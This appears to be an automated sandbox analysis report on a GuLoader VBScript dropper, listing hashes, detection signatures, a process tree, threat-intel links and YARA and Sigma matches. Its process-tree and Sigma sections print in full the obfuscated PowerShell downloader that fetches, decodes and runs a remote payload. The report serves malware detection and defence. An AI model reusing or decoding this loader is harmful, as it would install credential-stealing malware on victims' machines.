Edit tour

Windows Analysis Report
10145202485.vbs

Overview

General Information

Sample name:	10145202485.vbs
Analysis ID:	1533834
MD5:	0689a82273ebbfa26e83cd5d497be3f2
SHA1:	b0895a2f4edd783e8b95660cc12261f266288347
SHA256:	389fd7e2ea34dbf59f58d90b5d4a5e9231b820ee6e3315861ec63fe4b828e71c
Tags:	vbsuser-abuse_ch
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

VBScript performs obfuscated calls to suspicious functions

Yara detected GuLoader

Yara detected Powershell download and execute

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Potential evasive VBS script found (sleep loop)

Queues an APC in another process (thread injection)

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses ping.exe to check the status of other devices and networks

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Msiexec Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7656 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10145202485.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cmd.exe (PID: 7724 cmdline: cmd.exe /c ping aszzzw_6777.6777.6777.677e MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 7776 cmdline: ping aszzzw_6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)

powershell.exe (PID: 7816 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hjemmebagerier Semicontradiction Anelser Raadgivningsvirksomheds #>;$Amtskonger='Galopperende';<#Lgknoldet Squiddle Hypozeuxis Prkeners #>;$Klasselotteriernes=$Argand+$host.UI;If ($Klasselotteriernes) {$Spionkamera++;}function Wirepullers($Whiniest){$Hyperscrupulous=$Synchronizable+$Whiniest.'Length'-$Spionkamera; for( $Alvearies210=4;$Alvearies210 -lt $Hyperscrupulous;$Alvearies210+=5){$Paasyningens++;$Fideikommiserne+=$Whiniest[$Alvearies210];$Milanesisk='Besprinkles';}$Fideikommiserne;}function Baggrundsfarve102($Effektivere){ . ($Schoolgirlism) ($Effektivere);}$Cedertrs=Wirepullers 'UnquMPigho Ef z,keai HanlMasklflueaQuer/ C,n ';$Cedertrs+=Wirepullers 'Simu5Saa..Inte0Pat. odou(Pe pWN,uri P.onAnded,ratoSpurwHy ds .de fedeNJenkTGavm Fold1Dig 0Buen.F.cu0 Fly;Urra ParaWBe iiI fonEs.e6Fris4Hver;Zyg Vidux unn6Mult4Svul;Iiis CnidrPretvYode:F.mi1Unsc3H,an1Duff.Stup0stjd) Geo Str.GAnkeet,enc StokTideoRing/ Sk 2 Nat0Svi.1Prop0Rub,0Hypa1 Ku 0Back1Sla OplaFForuiSterrPateeknu,fElisoDemoxfr m/Endu1Nuth3Ucsu1Comp.Ek p0 El, ';$Pladevenderne=Wirepullers 'Imm UGenls MicE HesRb,ma-NdtraCitrGusure Ko NParaTU,pr ';$Dekagrammet=Wirepullers 'Unphh EfttR,fetThorp plsvari: Kon/Spli/CanupBalerOmsloHelimCa aeInstnFinatBaadeCeylrKrum. R irTimesKvar/ MaaD Disi fgapnoyaoHus dPar,iBetadB li.SkvhpAflnfP.anmBelo ';$Forslagenes37=Wirepullers ' ste>Se p ';$Schoolgirlism=Wirepullers ' ChiiBukoePrutX.riz ';$almengr='Bredendes';$Effektfuldes146='\Stderes.Ide';Baggrundsfarve102 (Wirepullers ' nsa$FromG Ny LB.flo,arrBG staInfelTeks: amacHopehmun aphysI onRGentlsveji KroFBl kTProc=regi$Pr,dEProtNRa gv Udk: ShaaStatp ecaPMav D S.gAFrokt K iASubt+Per,$KardeLiddfUns FDiffELng.KBostTUncoFSl kUSkydLBou.dT aneNondsNoto1Felt4M re6Sera ');Baggrundsfarve102 (Wirepullers ' Shi$ButlGVestlSupeoVerdBUrsta PrelBoom:Blgecvivao Hexw,ageATrylGoutbEComp=Su v$Grild Pr eVeneKFjenacruigSig,RzygoAH.anmPopumUntee U mtT,ls.Frems antpAstrLSortIUnvotSyrm(Byge$StatfKvivO MetRUn.wsZelolBoylAHallG SalES senw beeTjekSChae3Conf7Temp)Sovs ');Baggrundsfarve102 (Wirepullers 'Blnd[mononKommEDy.aTIne .LedeS NorEUncoRSkndv PotICurrCForgEPseupcytooAflbiSpannSp,ntB abmIngeaUnbeN PokANakeGStile aurrSmok]Infi:plec:EquisTandE.ngecV,diUCyliR ChaIApplTTilsYAminP Urkrstiko VerTDeltODemic,olyoAlliLFrie K or=Lill Thu[ Endn A.cE Mu tSing.Spi,S,frie Ya CLsegUForsR W ni racTHalvY SynPHhv rfudgoBurrtLandoi tecSch,oHydrL,peet G nYhercpTricEDo,a]D ne:Van :aflytMr,el FnisAtte1 ,er2Unde ');$Dekagrammet=$Cowage[0];$Metrernes=(Wirepullers ' Ned$Va.dgDr mLP ago agsb DadAkinolOb i: KraEWhipDD ruIAid TBullePokerhe,veF,isS oxe= Geon deleUnplW C m-NyopoUn.xb OpsjNon eUncoCSpanT kuf H emS IndySpilSStiftSokkeRonnm skl.Vi iN,hooeGo dt Sej.Forhw PekEReawbR viCPhallSev,IGruseLew nMonsTFour ');Baggrundsfarve102 ($Metrernes);Baggrundsfarve102 (Wirepullers 'Damm$VoltEParadGsteiSkintDuraePinwrHa re OrcsAars. De.HM,dveMan aDiridSkabe Es rShaks ho[Forp$ HepP,gtvlRammado,bdUnineJernv Agee bienund,dEchoe Ko.rTrninUndieInt ]Kje.=Vare$ H nCDatte SimdNds.eBenar GretOpverBiins Lom ');$Stoppesteders=Wirepullers ' B d$UnbeE Xyld St isn ktklineT,ffrKvale nhasTele.De tDUnauoHnsswNa.pnEftelSw.noVanaaHeted fagFCou,iFilml buneBi,c(Tou,$InbeDJolae OmskRev aParmg G.yrHolma Hanm,earmMis,ePrest Def, efa$EuchH Fo egudskIntes Kade.nred TheoNr,ekFo.mt S,eo Belr,nio)Prep ';$Heksedoktor=$Chairlift;Baggrundsfarve102 (Wirepullers 'Aden$DesiGNaviLTandOMinab StaaMor LPhen: GartSek iPro.NBe lgFib eLivenDemaereamSEdwa=Du g(Ru dtOut EAr,hs subtChem-DemipWkthAdaviTGypshStor Hin$ElidHFernE isgkSylvs MarET.lsDEliaOanark B ttAmplOResuR ran) As ');while (!$tingenes) {Baggrundsfarve102 (Wirepullers 'Nske$vedugP,oplRe io TrtbEnetaacidlBrnd: ycaA quegD.uteUnkerIndheDra n Vai=Me.l$PepttHaanr,jtruKa.ieMem ') ;Baggrundsfarve102 $Stoppesteders;Baggrundsfarve102 (Wirepullers 'LayoSskketCenta f or Ad TF,di-YngeS J.wl,asseE uleAnlbP ska to v4Pr.f ');Baggrundsfarve102 (Wirepullers 'Seas$SkalGSpidlMiraOChelb .onaUbruLSitu:LangTUn,liskurNIndfG strEinddnBesvE YupSTerm=Tetr( In.TestaeA insFripTTrul- A sPGy,gAP.estPa.ahArga Ital$S.anHI raeAniwKDrilsKotue eriDSurfoRedeKSnipTOverOPilerBlok)C rv ') ;Baggrundsfarve102 (Wirepullers 'Udda$ eigMisplSteroFi kbFor ATil lAc o: ho.tS deAUtnkL luiL SteI eleaShufT orauShamMOlig= rak$ ndgSletl naO Vaab esoaPostLQuil:EkstAGeneU ComBS iprCockIBigoeSupeT CraaWeir+ Qua+ Bri%Konc$ FunC ,loOPalaWCapiaNonpG elaEGa,t. Filc StaO Udmu ,kyNFornT Ing ') ;$Dekagrammet=$Cowage[$Talliatum];}$Avlsdyr=312700;$flonel=30554;Baggrundsfarve102 (Wirepullers 'Bl m$IndeGdipllSlalo .awBHarvaAgliLKrad: oftS RefaMalmN ebefReprEPortdConfeJordi ,orSSp.stHorsIShoes WmkKHvssEskru Mu k=Skru He sGSuprE CraTP rc-Pip C Ar OKar N ndvt .ivEAfvaNreinTE he Far,$ Sq hUnseeRelaK cinS StaEHo oD.espoMateKYan.TS,vrO,estrTane ');Baggrundsfarve102 (Wirepullers 'Skj $Mim gDejelStraoLevebFj iaAfbel Jom:CoenPFlgelBaroaVolcnCa.aeOto,rC asi C rnFiolgForl K dn= yv Gru[FalkSSvajy svbstur tNo.ce NonmFax,.BaphCBastopa,fn ChovResueHypsr ComtBo s]O,nk:Sulc:FaraFOverrGrejoScepm JdiBBr saSubtsResteProm6 Sky4EnerSMuk tEkstr Plai ammnSun gclei(Lakf$Nu iSMellaFlamn Tilf IncePolidau oeDu lisu csGrovtFolkiPa,as U,dkT boe iss) fl, ');Baggrundsfarve102 (Wirepullers 'Ti,s$ Ou GModeLLaidoSideBR cuaForgLRbar:BlodTmotoa SkrA ssigS.naEUnfeb anta BrunPel k Q.iE ,oarUdlu komp=For rbi[ kufSp lpyAmyrs eckt UnnEBlo Mi.tr.fru tOptae PraxOphjTLith. eteBassNClosC .trOUpbrdValdIFe.iNSjofgPent],pli:Over:Dom aZaursInt,Ca.tiiBlodIForb.TvangTilbE tefTKlagsThirTSpriRBekmIAns.n B og.rip(Cy r$ .hepMargL prea opantm ie,eriROutbITakonLignGU,bl)Te a ');Baggrundsfarve102 (Wirepullers 'G ps$ StoGNedklepidO Dribblo,a V.dlMers:FrgesHjrekLegeILepiSRegi= Hen$SocitTvanABusba Oveg uttETi bbreifABedknBignKN tiEpatiRBa,a.SlutsCre,uAktiBNa ssSocit ensrLedeiUnioN Sumg bl( fbr$udlgA.ottVJapaLIntesMarmDBedvYAdlir ubb,F ev$Tv,kfKinglHi doCarmn Unke SyrLBava)slet ');Baggrundsfarve102 $Skis;" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8040 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hjemmebagerier Semicontradiction Anelser Raadgivningsvirksomheds #>;$Amtskonger='Galopperende';<#Lgknoldet Squiddle Hypozeuxis Prkeners #>;$Klasselotteriernes=$Argand+$host.UI;If ($Klasselotteriernes) {$Spionkamera++;}function Wirepullers($Whiniest){$Hyperscrupulous=$Synchronizable+$Whiniest.'Length'-$Spionkamera; for( $Alvearies210=4;$Alvearies210 -lt $Hyperscrupulous;$Alvearies210+=5){$Paasyningens++;$Fideikommiserne+=$Whiniest[$Alvearies210];$Milanesisk='Besprinkles';}$Fideikommiserne;}function Baggrundsfarve102($Effektivere){ . ($Schoolgirlism) ($Effektivere);}$Cedertrs=Wirepullers 'UnquMPigho Ef z,keai HanlMasklflueaQuer/ C,n ';$Cedertrs+=Wirepullers 'Simu5Saa..Inte0Pat. odou(Pe pWN,uri P.onAnded,ratoSpurwHy ds .de fedeNJenkTGavm Fold1Dig 0Buen.F.cu0 Fly;Urra ParaWBe iiI fonEs.e6Fris4Hver;Zyg Vidux unn6Mult4Svul;Iiis CnidrPretvYode:F.mi1Unsc3H,an1Duff.Stup0stjd) Geo Str.GAnkeet,enc StokTideoRing/ Sk 2 Nat0Svi.1Prop0Rub,0Hypa1 Ku 0Back1Sla OplaFForuiSterrPateeknu,fElisoDemoxfr m/Endu1Nuth3Ucsu1Comp.Ek p0 El, ';$Pladevenderne=Wirepullers 'Imm UGenls MicE HesRb,ma-NdtraCitrGusure Ko NParaTU,pr ';$Dekagrammet=Wirepullers 'Unphh EfttR,fetThorp plsvari: Kon/Spli/CanupBalerOmsloHelimCa aeInstnFinatBaadeCeylrKrum. R irTimesKvar/ MaaD Disi fgapnoyaoHus dPar,iBetadB li.SkvhpAflnfP.anmBelo ';$Forslagenes37=Wirepullers ' ste>Se p ';$Schoolgirlism=Wirepullers ' ChiiBukoePrutX.riz ';$almengr='Bredendes';$Effektfuldes146='\Stderes.Ide';Baggrundsfarve102 (Wirepullers ' nsa$FromG Ny LB.flo,arrBG staInfelTeks: amacHopehmun aphysI onRGentlsveji KroFBl kTProc=regi$Pr,dEProtNRa gv Udk: ShaaStatp ecaPMav D S.gAFrokt K iASubt+Per,$KardeLiddfUns FDiffELng.KBostTUncoFSl kUSkydLBou.dT aneNondsNoto1Felt4M re6Sera ');Baggrundsfarve102 (Wirepullers ' Shi$ButlGVestlSupeoVerdBUrsta PrelBoom:Blgecvivao Hexw,ageATrylGoutbEComp=Su v$Grild Pr eVeneKFjenacruigSig,RzygoAH.anmPopumUntee U mtT,ls.Frems antpAstrLSortIUnvotSyrm(Byge$StatfKvivO MetRUn.wsZelolBoylAHallG SalES senw beeTjekSChae3Conf7Temp)Sovs ');Baggrundsfarve102 (Wirepullers 'Blnd[mononKommEDy.aTIne .LedeS NorEUncoRSkndv PotICurrCForgEPseupcytooAflbiSpannSp,ntB abmIngeaUnbeN PokANakeGStile aurrSmok]Infi:plec:EquisTandE.ngecV,diUCyliR ChaIApplTTilsYAminP Urkrstiko VerTDeltODemic,olyoAlliLFrie K or=Lill Thu[ Endn A.cE Mu tSing.Spi,S,frie Ya CLsegUForsR W ni racTHalvY SynPHhv rfudgoBurrtLandoi tecSch,oHydrL,peet G nYhercpTricEDo,a]D ne:Van :aflytMr,el FnisAtte1 ,er2Unde ');$Dekagrammet=$Cowage[0];$Metrernes=(Wirepullers ' Ned$Va.dgDr mLP ago agsb DadAkinolOb i: KraEWhipDD ruIAid TBullePokerhe,veF,isS oxe= Geon deleUnplW C m-NyopoUn.xb OpsjNon eUncoCSpanT kuf H emS IndySpilSStiftSokkeRonnm skl.Vi iN,hooeGo dt Sej.Forhw PekEReawbR viCPhallSev,IGruseLew nMonsTFour ');Baggrundsfarve102 ($Metrernes);Baggrundsfarve102 (Wirepullers 'Damm$VoltEParadGsteiSkintDuraePinwrHa re OrcsAars. De.HM,dveMan aDiridSkabe Es rShaks ho[Forp$ HepP,gtvlRammado,bdUnineJernv Agee bienund,dEchoe Ko.rTrninUndieInt ]Kje.=Vare$ H nCDatte SimdNds.eBenar GretOpverBiins Lom ');$Stoppesteders=Wirepullers ' B d$UnbeE Xyld St isn ktklineT,ffrKvale nhasTele.De tDUnauoHnsswNa.pnEftelSw.noVanaaHeted fagFCou,iFilml buneBi,c(Tou,$InbeDJolae OmskRev aParmg G.yrHolma Hanm,earmMis,ePrest Def, efa$EuchH Fo egudskIntes Kade.nred TheoNr,ekFo.mt S,eo Belr,nio)Prep ';$Heksedoktor=$Chairlift;Baggrundsfarve102 (Wirepullers 'Aden$DesiGNaviLTandOMinab StaaMor LPhen: GartSek iPro.NBe lgFib eLivenDemaereamSEdwa=Du g(Ru dtOut EAr,hs subtChem-DemipWkthAdaviTGypshStor Hin$ElidHFernE isgkSylvs MarET.lsDEliaOanark B ttAmplOResuR ran) As ');while (!$tingenes) {Baggrundsfarve102 (Wirepullers 'Nske$vedugP,oplRe io TrtbEnetaacidlBrnd: ycaA quegD.uteUnkerIndheDra n Vai=Me.l$PepttHaanr,jtruKa.ieMem ') ;Baggrundsfarve102 $Stoppesteders;Baggrundsfarve102 (Wirepullers 'LayoSskketCenta f or Ad TF,di-YngeS J.wl,asseE uleAnlbP ska to v4Pr.f ');Baggrundsfarve102 (Wirepullers 'Seas$SkalGSpidlMiraOChelb .onaUbruLSitu:LangTUn,liskurNIndfG strEinddnBesvE YupSTerm=Tetr( In.TestaeA insFripTTrul- A sPGy,gAP.estPa.ahArga Ital$S.anHI raeAniwKDrilsKotue eriDSurfoRedeKSnipTOverOPilerBlok)C rv ') ;Baggrundsfarve102 (Wirepullers 'Udda$ eigMisplSteroFi kbFor ATil lAc o: ho.tS deAUtnkL luiL SteI eleaShufT orauShamMOlig= rak$ ndgSletl naO Vaab esoaPostLQuil:EkstAGeneU ComBS iprCockIBigoeSupeT CraaWeir+ Qua+ Bri%Konc$ FunC ,loOPalaWCapiaNonpG elaEGa,t. Filc StaO Udmu ,kyNFornT Ing ') ;$Dekagrammet=$Cowage[$Talliatum];}$Avlsdyr=312700;$flonel=30554;Baggrundsfarve102 (Wirepullers 'Bl m$IndeGdipllSlalo .awBHarvaAgliLKrad: oftS RefaMalmN ebefReprEPortdConfeJordi ,orSSp.stHorsIShoes WmkKHvssEskru Mu k=Skru He sGSuprE CraTP rc-Pip C Ar OKar N ndvt .ivEAfvaNreinTE he Far,$ Sq hUnseeRelaK cinS StaEHo oD.espoMateKYan.TS,vrO,estrTane ');Baggrundsfarve102 (Wirepullers 'Skj $Mim gDejelStraoLevebFj iaAfbel Jom:CoenPFlgelBaroaVolcnCa.aeOto,rC asi C rnFiolgForl K dn= yv Gru[FalkSSvajy svbstur tNo.ce NonmFax,.BaphCBastopa,fn ChovResueHypsr ComtBo s]O,nk:Sulc:FaraFOverrGrejoScepm JdiBBr saSubtsResteProm6 Sky4EnerSMuk tEkstr Plai ammnSun gclei(Lakf$Nu iSMellaFlamn Tilf IncePolidau oeDu lisu csGrovtFolkiPa,as U,dkT boe iss) fl, ');Baggrundsfarve102 (Wirepullers 'Ti,s$ Ou GModeLLaidoSideBR cuaForgLRbar:BlodTmotoa SkrA ssigS.naEUnfeb anta BrunPel k Q.iE ,oarUdlu komp=For rbi[ kufSp lpyAmyrs eckt UnnEBlo Mi.tr.fru tOptae PraxOphjTLith. eteBassNClosC .trOUpbrdValdIFe.iNSjofgPent],pli:Over:Dom aZaursInt,Ca.tiiBlodIForb.TvangTilbE tefTKlagsThirTSpriRBekmIAns.n B og.rip(Cy r$ .hepMargL prea opantm ie,eriROutbITakonLignGU,bl)Te a ');Baggrundsfarve102 (Wirepullers 'G ps$ StoGNedklepidO Dribblo,a V.dlMers:FrgesHjrekLegeILepiSRegi= Hen$SocitTvanABusba Oveg uttETi bbreifABedknBignKN tiEpatiRBa,a.SlutsCre,uAktiBNa ssSocit ensrLedeiUnioN Sumg bl( fbr$udlgA.ottVJapaLIntesMarmDBedvYAdlir ubb,F ev$Tv,kfKinglHi doCarmn Unke SyrLBava)slet ');Baggrundsfarve102 $Skis;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 7460 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

zGmdnmqGCKDq.exe (PID: 6240 cmdline: "C:\Program Files (x86)\nGmUtrSSHeyZLhnwDRloQwCXddRunuJbCqTwTybMgJuESbiKDQDsAo\zGmdnmqGCKDq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

verclsid.exe (PID: 4764 cmdline: "C:\Windows\SysWOW64\verclsid.exe" MD5: 190A347DF06F8486F193ADA0E90B49C5)

firefox.exe (PID: 7800 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.1700021777.0000000008960000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000007.00000002.1700261011.000000000BB86000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000007.00000002.1681206300.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000005.00000002.1506470995.000001BDA3983000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
Process Memory Space: powershell.exe PID: 7816	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7816	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x64c94:$b2: ::FromBase64String( 0x958c1:$b2: ::FromBase64String( 0x958fa:$b2: ::FromBase64String( 0x95934:$b2: ::FromBase64String( 0x9596f:$b2: ::FromBase64String( 0x959ab:$b2: ::FromBase64String( 0x959e8:$b2: ::FromBase64String( 0x95a26:$b2: ::FromBase64String( 0x95a65:$b2: ::FromBase64String( 0x95aa5:$b2: ::FromBase64String( 0x95ae6:$b2: ::FromBase64String( 0x95b28:$b2: ::FromBase64String( 0x95b6b:$b2: ::FromBase64String( 0x95baf:$b2: ::FromBase64String( 0x95bf4:$b2: ::FromBase64String( 0x95c3a:$b2: ::FromBase64String( 0x95c81:$b2: ::FromBase64String( 0x95cc9:$b2: ::FromBase64String( 0x2dc27:$s1: -join 0xbcc0d:$s1: -join 0xbd36d:$s1: -join
Process Memory Space: powershell.exe PID: 8040	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 8040	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x24ee1:$b2: ::FromBase64String( 0x1e1c0:$s1: -join 0x9de0c:$s1: -join 0xaaee1:$s1: -join 0xae2b3:$s1: -join 0xae965:$s1: -join 0xb0456:$s1: -join 0xb265c:$s1: -join 0xb2e83:$s1: -join 0xb36f3:$s1: -join 0xb3e2e:$s1: -join 0xb3e60:$s1: -join 0xb3ea8:$s1: -join 0xb3ec7:$s1: -join 0xb4717:$s1: -join 0xb4893:$s1: -join 0xb490b:$s1: -join 0xb499e:$s1: -join 0xb4c04:$s1: -join 0xb6d9a:$s1: -join 0xc57e4:$s1: -join
Click to see the 3 entries

Other

Source	Rule	Description	Author	Strings
amsi64_7816.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_8040.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xc368:$b2: ::FromBase64String( 0xb3e8:$s1: -join 0x4b94:$s4: += 0x4c56:$s4: += 0x8e7d:$s4: += 0xaf9a:$s4: += 0xb284:$s4: += 0xb3ca:$s4: += 0x15468:$s4: += 0x154e8:$s4: += 0x155ae:$s4: += 0x1562e:$s4: += 0x15804:$s4: += 0x15888:$s4: += 0xbc0a:$e4: Get-WmiObject 0xbdf9:$e4: Get-Process 0xbe51:$e4: Start-Process 0x160df:$e4: Get-Process

Sigma Signatures

System Summary

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hjemmebagerier Semicontradiction Anelser Raadgivningsvirksomheds #>;$Amtskonger='Galopperende';<#Lgknoldet Squiddle Hypozeuxis Prkeners #>;$Klasselotteriernes=$Argand+$host.UI;If ($Klasselotteriernes) {$Spionkamera++;}function Wirepullers($Whiniest){$Hyperscrupulous=$Synchronizable+$Whiniest.'Length'-$Spionkamera; for( $Alvearies210=4;$Alvearies210 -lt $Hyperscrupulous;$Alvearies210+=5){$Paasyningens++;$Fideikommiserne+=$Whiniest[$Alvearies210];$Milanesisk='Besprinkles';}$Fideikommiserne;}function Baggrundsfarve102($Effektivere){ . ($Schoolgirlism) ($Effektivere);}$Cedertrs=Wirepullers 'UnquMPigho Ef z,keai HanlMasklflueaQuer/ C,n ';$Cedertrs+=Wirepullers 'Simu5Saa..Inte0Pat. odou(Pe pWN,uri P.onAnded,ratoSpurwHy ds .de fedeNJenkTGavm Fold1Dig 0Buen.F.cu0 Fly;Urra ParaWBe iiI fonEs.e6Fris4Hver;Zyg Vidux unn6Mult4Svul;Iiis CnidrPretvYode:F.mi1Unsc3H,an1Duff.Stup0stjd) Geo Str.GAnkeet,enc StokTideoRing/ Sk 2 Nat0Svi.1Prop0Rub,0Hypa1 Ku 0Back1Sla OplaFForuiSterrPateeknu,fElisoDemoxfr m/Endu1Nuth3Ucsu1Comp.Ek p0 El, ';$Pladevenderne=Wirepullers 'Imm UGenls MicE HesRb,ma-NdtraCitrGusure Ko NParaTU,pr ';$Dekagrammet=Wirepullers 'Unphh EfttR,fetThorp plsvari: Kon/Spli/CanupBalerOmsloHelimCa aeInstnFinatBaadeCeylrKrum. R irTimesKvar/ MaaD Disi fgapnoyaoHus dPar,iBetadB li.SkvhpAflnfP.anmBelo ';$Forslagenes37=Wirepullers ' ste>Se p ';$Schoolgirlism=Wirepullers ' ChiiBukoePrutX.riz ';$almengr='Bredendes';$Effektfuldes146='\Stderes.Ide';Baggrundsfarve102 (Wirepullers ' nsa$FromG Ny LB.flo,arrBG staInfelTeks: amacHopehmun aphysI onRGentlsveji KroFBl kTProc=regi$Pr,dEProtNRa gv Udk: ShaaStatp ecaPMav D S.gAFrokt K iASubt+Per,$KardeLiddfUns FDiffELng.KBostTUncoFSl kUSkydLBou.dT aneNondsNoto1Felt4M re6Sera ');Baggrundsfarve102 (Wirepullers ' Shi$ButlGVestlSupeoVerdBUrsta PrelBoom:Blgecvivao Hexw,ageATrylGoutbEComp=Su v$Grild Pr eVeneKFjenacruigSig,RzygoAH.anmPopumUntee U mtT,ls.Frems antpAstrLSortIUnvotSyrm(Byge$StatfKvivO MetRUn.wsZelolBoylAHallG SalES senw beeTjekSChae3Conf7Temp)Sovs ');Baggrundsfarve102 (Wirepullers 'Blnd[mononKommEDy.aTIne .LedeS NorEUncoRSkndv PotICurrCForgEPseupcytooAflbiSpannSp,ntB abmIngeaUnbeN PokANakeGStile aurrSmok]Infi:plec:EquisTandE.ngecV,diUCyliR ChaIApplTTilsYAminP Urkrstiko VerTDeltODemic,olyoAlliLFrie K or=Lill Thu[ Endn A.cE Mu tSing.Spi,S,frie Ya CLsegUForsR W ni racTHalvY SynPHhv rfudgoBurrtLandoi tecSch,oHydrL,peet G nYhercpTricEDo,a]D ne:Van :aflytMr,el FnisAtte1 ,er2Unde ');$Dekagrammet=$Cowage[0];$Metrernes=(Wirepullers ' Ned$Va.dgDr mLP ago agsb DadAkinolOb i: KraEWhipDD ruIAid TBullePokerhe,veF,isS oxe= Geon deleUnplW C m-NyopoUn.xb OpsjNon eUncoCSpanT kuf H emS IndySpilSStiftSokkeRonnm skl.Vi iN,hooeGo dt Sej.Forhw PekEReawbR viCPhallSev,IGruseLew nMonsTFour ');Baggrundsfarve102 ($Metrernes);Baggrundsfarve102 (Wirepullers 'Damm$VoltEParadGsteiSkintDuraePinwrHa re OrcsAars. De.HM,dveMan aDiridSkabe Es rShaks ho[Forp$ HepP,gtvlRammado,bdUni

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10145202485.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10145202485.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10145202485.vbs", ProcessId: 7656, ProcessName: wscript.exe

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

